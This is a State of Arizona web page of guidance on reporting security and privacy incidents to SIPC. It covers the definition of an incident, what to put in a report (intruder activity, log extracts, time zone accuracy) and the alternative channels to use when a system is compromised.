|
State of Arizona Security and Privacy Incident
Reporting
Incident Definition:
An incident is defined as an
act of violating an explicit or implied security or privacy policy. The
definition includes, but is not limited to, types of activities that are
widely recognized as being in violation of policy:
- Attempts (either
failed or successful) to gain unauthorized access to a system or
it’s data/information
- Unwanted
disruption or denial of service
- The unauthorized
use of a system for the processing or storage of data
- Changes to system
hardware, firmware, or software characteristics without the owner’s
knowledge, instruction or consent
- Unauthorized access, alteration, disclosure, loss, theft or
acquisition of non-electronic confidential information
- Confidential information may be defined by agency policy or
by Arizona law
Report any activities that
meet these criteria for being an incident. When reporting activity that
may be the work of multiple intruders, we request that you report each
incident separately.
Back to Top
Description of the
Activity:
Reporting incidents to SIPC
helps to promote greater security awareness and improve the security of
services provided by the Internet. By reporting the incident,
information can be collected about this activity and if evident,
correlate other incidents to this intrusion.
One of the most important parts of the incident report is a description
of the intruder’s activity. Mention any vulnerabilities which may have
been exploited, modifications that were made to the system, or software
that was installed. You may include references to advisories or other
documents which describe the activity in more detail.
Back to Top
Log Extracts Showing the
Activity:
Whenever possible, include log
entries showing the activity with the report, particularly when the logs
provide significant detail. Log entries that are not related to the
intruder activity should be removed to help avoid confusion. If the
intruder’s activity generated a large number of very similar entries, it
is usually sufficient to extract a sample portion of the log, indicate
this in your message. A quick estimate of the number of log entries is
useful as well. A description of the log format will be helpful and very
important for log entries that do not include descriptive text, or are
generated by tools that are not widely distributed. When sending log
entries, ensure that you do not violate any non-disclosure policies that
your agency has in place. If the logs do not show the intruder’s
activity (perhaps because they were deleted by the intruder), then state
this clearly in the report to help minimize requests for this
information.
Back to Top
Time Zone and the Accuracy
of your Clock:
Clearly identify the time zone
for your comments and logs. A time zone relative to GMT (or UTC) is
preferred, since less formal time zone designations can be
misinterpreted. If the times recorded in the log entries are known to be
inaccurate by more than a minute or two, include a statement of this
inaccuracy. If the system was synchronized with a national time server,
mention this fact as well.
Back to Top
Reporting Issues and
Alternatives:
Electronic mail also provides
an accurate and efficient medium for exchanging information too complex
to discuss over the telephone, such as dumps, or large log files. E-Mail
also provides a reliable log of communications that may be referred too
when responding to the incident.
If you are disconnected from the Internet to recover from a compromise,
or if you are unable to send mail due to a denial of service attack,
contact SIPC on the telephone hot line. Occasionally, a compromised
system’s electronic mail will be monitored by the intruder. If you are
unable to obtain Internet mail access from the system, and do not want
to alert the intruder by using e-mail on the compromised system, contact
SIPC on the telephone.
When electronic mail is not available or provides inadequate security,
and you have logs or other information that is not easily conveyed on
the telephone, send the information via FAX.
Back to Top |
